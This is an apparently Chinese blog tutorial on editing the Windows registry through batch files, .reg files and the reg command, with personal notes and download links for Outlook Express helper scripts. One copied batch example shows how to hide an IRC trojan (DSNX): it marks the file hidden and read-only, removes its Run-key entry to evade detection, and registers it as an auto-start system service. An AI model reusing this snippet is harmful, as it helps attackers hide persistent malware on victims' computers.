一,批处理生成.Reg文件操作注册表
用批处理中的重定向符号可以轻松地生成.reg文件。然后用命令执行.reg文件即可!
这里,着重要了解.reg文件操作注册表的方法。
首先.reg文件首行必须是:Windows Registry Editor Version 5.00。然后才是操作注册表的内容。
(就和从注册表中导出的文件格式一致)
1,创建子项
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWARETTT]
在HKEY_LOCAL_MACHINESOFTWARE下创建了一个名字为“TTT”的子项。
2,创建一个项目名称
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWARETTT]
"Name"="TTT BLOG"
"EMail"="[email protected]"
"URL"="http://www.taoyoyo.net/ttt/"
"Type"=dword:02
这样就在[HKEY_LOCAL_MACHINESOFTWARETTT]下新建了:Name、EMail、 URL、Type这四个项目
Name、Email、URL的类型是“String Value”
Type的类型是“DWORD Value”
(附:windows注册表值类型:
REG_SZ 字符串值
REG_BINARY 二进制值
REG_DWORD DWORD值
REG_MULTI_SZ 多字符串值
REG_EXPAND_SZ 可扩充字符串值)
3,修改键值
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。就象新建一样即可。可以一次修改同一子项下的多个项目。
4,删除项目名称
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWARETTT]
"EMail"=-
执行该脚本,"EMail"就被删除了;
5,删除子项
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWARETTT]
[-HKEY_LOCAL_MACHINESOFTWAREDDD]
执行该脚本,子项ttt和ddd就已经被删除了。
6,.reg文件执行方法
1)直接执行reg文件
2)regedit /s *.reg (/s不用确认)
3)reg import *.reg
7,其实,我们也可以用dll文件代替reg文件。
批处理例1:
@echo offecho Windows Registry Editor Version 5.00 >t1.regecho.echo [HKEY_LOCAL_MACHINESOFTWARETTT] >>t1.regecho "Name"="TTT BLOG" >>t1.regecho "EMail"="[email protected]" >>t1.regecho "URL"="http://www.taoyoyo.net/ttt/" >>t1.regecho "Type"=dword:02 >>t1.regregedit /s t1.regdel /q t1.regpause
批处理2:(这个例子是别人的,不是很懂的说~~)
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启 动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例 (名为windrv32.exe)
@start windrv32.exe@attrib +h +r windrv32.exe@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll@echo "windsnx "=- >>patch.dll@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe@regedit /s patch.dll@delete patch.dll@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]@REM 这样不是更安全^_^.
二,reg命令操作注册表
Reg命令是Windows提供的一下专门操作注册表的工具。可以方便的查询,添加,删除,导入,导出,比较等操作。具体可以参考系统自带的帮助……
REG Operation [参数列表]Operation [ QUERY | ADD | DELETE | COPY |SAVE | LOAD | UNLOAD | RESTORE |COMPARE | EXPORT | IMPORT ]
1,查询所有子项和值
D:>reg query hklmsoftwareTTT! REG.EXE VERSION 3.0HKEY_LOCAL_MACHINEsoftwareTTTName REG_SZ TTT BLOGEMail REG_SZ [email protected]URL REG_SZ http://www.taoyoyo.net/ttt/Type REG_DWORD 0x2
2,查询特定项
D:>reg query hklmsoftware tt /v url! REG.EXE VERSION 3.0HKEY_LOCAL_MACHINEsoftware tturl REG_SZ http://www.taoyoyo.net/ttt/
这里最难的是如何取得我们想要的字符串呢,困惑了好长时间,终于找到方法了。
原来也没有别的好办法,只能用find,for循环来截取我们需要的内容。(下面的例子如果看不懂,请参考本博客另外的文章:DOS循环-bat/批处理for命令详解之二)
例如我们要得到url的键值: http://www.taoyoyo.net/ttt/,可以用以下脚本:
@ECHO OFFfor /f "tokens=1,2,3,4,*" %%i in (^reg query "HKEY_LOCAL_MACHINEsoftware tt" ^| find /i "URL"^) do SET "pURL=%%k"echo TTT BLOG的URL值为:%pURL%
保存为Test.bat,运行结果如下:
D:>test.batTTT BLOG的URL值为:http://www.taoyoyo.net/ttt/
不行了,家里的电脑不知为啥,在命令行中一运行“REG”命令(包括reg /?),CPU就占用100%,看任务管理器,CMD占用百分之八十多,不知道为啥……
运行其他的命令就没有问题,包括regedit /s……
查了一下,网上有说是中了木马的原因,但查了一下,也不象。既没有找到相关文件,而且运行其它的命令时,没有问题……
先不搞了,正好手头有个REG命令详解,等会整理一下!
因为查毒,用自己做的Clear.bat清理了一下C盘,居然清理出1个G的空间来,原来只剩几百兆了……windows的垃圾真是多啊~~不要忘了经常清理一下啊!
再发布两个做好的批处理文件,可以自动监控OutLook Express,有需要的可以点击下载……
1,OEMonitorCount.bat 功能:可以重设注册表中OE打开次数,避免超过100次时提示压缩
2,OEMonitorSize.bat 功能:可以监控Outlook Express邮件文件(*.dbx)大小,当大于指定大小时,生成报警日志。
这两个文件,可以加到启动组里,每次开机自动运行!
搞这两个主要是为了解决公司经常出现的一些问题:
1)经常有人的邮件文件超过几个G;
2)有时而且根据提示压缩后,可能出现邮件丢失。
刚发现,下载后的文件又加了“htm"的后缀,请去掉此后缀再使用!
另外下载时,请使用下面的链接,如:千脑电信高速下载地址、千脑网通高速下载地址。上面的VIP链接是专供千脑用户使用的~~
Tag: BAT示例 Bat知识 Windows技巧 TTTBLOG